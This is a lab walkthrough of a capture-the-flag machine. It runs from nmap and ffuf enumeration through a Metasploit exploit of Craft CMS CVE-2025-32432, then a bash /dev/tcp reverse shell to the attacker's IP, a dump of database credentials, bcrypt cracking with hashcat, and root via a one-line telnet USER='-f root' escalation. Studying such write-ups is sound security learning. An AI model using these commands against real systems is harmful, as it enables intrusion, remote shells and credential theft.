Overview
The machine starts by enumerating a vhost running Craft CMS that is vulnerable to an unauthenticated pre-auth RCE (CVE-2025-32432), exploiting it to get shell as www-data, reading leaked database credentials from environment variables to dump the users table and crack an admin's bcrypt password hash to get SSH access as user, then abusing a local GNU inetutils telnet privilege escalation via the USER environment variable to get shell as root
Enumeration
start with nmap enumeration
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/orion]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.21.34
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-24 23:38 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
Initiating Ping Scan at 23:38
Scanning 10.129.21.34 [2 ports]
Completed Ping Scan at 23:38, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:38
Completed Parallel DNS resolution of 1 host. at 23:38, 0.10s elapsed
Initiating Connect Scan at 23:38
Scanning 10.129.21.34 [1000 ports]
Discovered open port 22/tcp on 10.129.21.34
Discovered open port 80/tcp on 10.129.21.34
Increasing send delay for 10.129.21.34 from 0 to 5 due to 71 out of 235 dropped probes since last increase.
Completed Connect Scan at 23:38, 11.59s elapsed (1000 total ports)
Initiating Service scan at 23:38
Scanning 2 services on 10.129.21.34
Completed Service scan at 23:38, 6.36s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.21.34.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:38
Completed NSE at 23:38, 5.58s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:38
Completed NSE at 23:38, 1.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
Nmap scan report for 10.129.21.34
Host is up, received syn-ack (0.14s latency).
Scanned at 2026-06-24 23:38:26 PDT for 24s
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
| 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
| _ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
| _http-title: Did not follow redirect to http://orion.htb/
| http-methods:
| _ Supported Methods: GET HEAD POST OPTIONS
| _http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.59 seconds
add the vhost to the hosts file
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/orion]
└──╼ [★]$ echo '10.129.21.34 orion.htb' | sudo tee -a /etc/hosts
10.129.21.34 orion.htb
Port 80

fuzzing for directories returns an admin dashboard
┌─[]─[10.10.16.206]─[jimmex@attacker]─[~/htb/labs/orion]
└──╼ [★]$ ffuf -u http://orion.htb/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://orion.htb/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.html [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 192ms]
admin [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 325ms]
.htm [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 307ms]
index [Status: 200, Size: 12272, Words: 1076, Lines: 386, Duration: 532ms]
logout [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 495ms]
assets [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 827ms]
. [Status: 200, Size: 12272, Words: 1076, Lines: 386, Duration: 487ms]
.htaccess [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 767ms]
CVE-2025-32432 to shell as www-data
it is craft cms 5.6.16 which is vulnerable to RCE

so i will use the msfconsole module for it (there isn't good public exploits for it and no need to replicate it manually again)
[msf](Jobs:0 Agents:0) exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > > set RHOSTS http://orion.htb/admin/login
RHOSTS => http://orion.htb/admin/login
[msf](Jobs:0 Agents:0) exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > > set LHOST 10.10.15.100
LHOST => 10.10.15.100
[msf](Jobs:0 Agents:0) exploit(linux/http/craftcms_preauth_rce_cve_2025_32432) > > run
[*] Started reverse TCP handler on 10.10.15.100:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Leaked session.save_path: /var/lib/php/sessions
[+] The target is vulnerable. Session path leaked
[*] Injecting stub & triggering payload...
[*] Sending stage (42137 bytes) to 10.129.21.34
[*] Meterpreter session 1 opened (10.10.15.100:4444 -> 10.129.21.34:39934) at 2026-06-25 03:40:06 -0400
shell
(Meterpreter 1)(/var/www/html/craft/web) >
(Meterpreter 1)(/var/www/html/craft/web) > shell
Process 1785 created.
Channel 0 created.
whoami
www-data
so reading the env files
env
CRAFT_DEV_MODE=true
CRAFT_DB_DRIVER=mysql
USER=www-data
HOME=/var/www
CRAFT_APP_ID=CraftCMS--67912ad2-1f1b-4993-bfec-e64daa5c23ff
CRAFT_ENVIRONMENT=dev
CRAFT_ALLOW_ADMIN_CHANGES=true
CRAFT_DB_SERVER=127.0.0.1
CRAFT_DB_PASSWORD=SuperSecureCraft123Pass!
CRAFT_DB_SCHEMA=
CRAFT_DB_USER=root
CRAFT_DISALLOW_ROBOTS=true
CRAFT_DB_PORT=3306
CRAFT_DB_DATABASE=orion
CRAFT_DB_TABLE_PREFIX=
PWD=/var/www/html/craft/web
PRIMARY_SITE_URL=http://orion.htb/
CRAFT_SECURITY_KEY=RRS86F6i2JQKdC6kfEI7frVxA47WVMx8
lets first get a proper shell
ls /bin/nc
/bin/nc
nc version is kinda old
nc 10.10.15.100 4444 -e bash
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit]
[-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
[destination] [port]
so I will use pipes and descriptors instead
(Meterpreter 1)(/var/www/html/craft/web) > shell
Process 1796 created.
Channel 2 created.
bash -c "bash -i >& /dev/tcp/10.10.15.100/4444 0>&1"
Shell as adam
getting a shell back, lets connect to mysql
mysql -h 127.0.0.1 -u root -p
Enter password: SuperSecureCraft123Pass!
show databases;
Database
information_schema
mysql
orion
listing all tables in the DB
use orion;
show tables;
Tables_in_orion
addresses
announcements
assetindexdata
assetindexingsessions
assets
assets_sites
authenticator
categories
categorygroups
categorygroups_sites
changedattributes
changedfields
craftidtokens
deprecationerrors
drafts
elementactivity
elements
elements_bulkops
elements_owners
elements_sites
entries
entries_authors
entrytypes
fieldlayouts
fields
globalsets
gqlschemas
gqltokens
imagetransformindex
imagetransforms
info
migrations
plugins
projectconfig
queue
recoverycodes
relations
resourcepaths
revisions
searchindex
sections
sections_entrytypes
sections_sites
sequences
sessions
shunnedmessages
sitegroups
sites
sso_identities
structureelements
structures
systemmessages
taggroups
tags
tokens
usergroups
usergroups_users
userpermissions
userpermissions_usergroups
userpermissions_users
userpreferences
users
volumefolders
volumes
webauthn
widgets
there is a lot but the users table is always interesting, where we find a hashes to crack
select * from users;
id photoId affiliatedSiteId active pending locked suspended admin username fullName firstName lastName email password lastLoginDate lastLoginAttemptIp invalidLoginWindowStart invalidLoginCount lastInvalidLoginDate lockoutDate hasDashboard verificationCode verificationCodeIssuedDate unverifiedEmail passwordResetRequired lastPasswordChangeDate dateCreated dateUpdated
1 NULL NULL 1 0 0 0 1 admin NULL NULL NULL adam@orion.htb $2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS 2026-03-12 11:25:04 NULL NULL NULL NULL NULL 1NULL NULL NULL 0 2026-03-12 11:24:51 2026-03-06 11:24:45 2026-03-12
and it cracked
┌─[eu-dedivip-3]─[10.10.15.100]─[jimmex04@htb-tvd9xynigr]─[~]
└──╼ [★]$ hashcat -m 3200 -a 0 '$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS' /usr/share/wordlists/rockyou.txt.gz
hashcat (v6.2.6) starting
OpenCL API (OpenCL 2.1 LINUX) - Platform #1 [Intel(R) Corporation]
==================================================================
* Device #1: AMD EPYC 7543 32-Core Processor, 3921/7907 MB (988 MB allocatable), 4MCU
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
====================================================================================================================================================
* Device #2: cpu-haswell-AMD EPYC 7543 32-Core Processor, skipped
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 0 MB
Dictionary cache building /usr/share/wordlists/rockyou.txt.gz: 33553434 bytes (6Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt.gz
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/B42LUg0lS:darkangel
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$13$e9zuohgFZzGtbQalcn9Mz.5PJbjxobO0GMbXo8NHp3P/...LUg0lS
Time.Started.....: Thu Jun 25 03:52:49 2026 (1 min, 8 secs)
Time.Estimated...: Thu Jun 25 03:53:57 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 10 H/s (6.27ms) @ Accel:4 Loops:32 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 656/14344385 (0.00%)
Rejected.........: 0/656 (0.00%)
Restore.Point....: 640/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:8160-8192
Candidate.Engine.: Device Generator
Candidates.#1....: sunshine1 -> sweetpea
Started: Thu Jun 25 03:52:41 2026
Stopped: Thu Jun 25 03:53:58 2026
testing the creds for ssh we get access as adam
adam@orion:~$ cat user.txt
3f0f07faa795ca47fdc7ac50b909e8e8
adam@orion:~$
Shell as root
listing ports reveals that telnet is running on system
adam@orion:~$ ss -lntp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 10 127.0.0.1:23 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*
adam@orion:~$
getting its version
adam@orion:~$ telnet --version
telnet (GNU inetutils) 2.7
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later < https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
this version was discovered to be vulnerable to LPE lately
and the exploitation is easy for this
adam@orion:~$ USER='-f root' telnet -a 127.0.0.1
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]' .
Linux 5.15.0-177-generic (orion) (pts/1)
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-177-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Thu Jun 25 08:03:51 AM UTC 2026
System load: 0.0 Processes: 230
Usage of /: 78.0% of 5.81GB Users logged in: 1
Memory usage: 10% IPv4 address for eth0: 10.129.21.34
Swap usage: 0%
=> There are 2 zombie processes.
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
2 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
root@orion:~# whoami
root
root@orion:~# cat /root/root.txt
7f105d48d6b18375604bd907b3f14da1
root@orion:~#
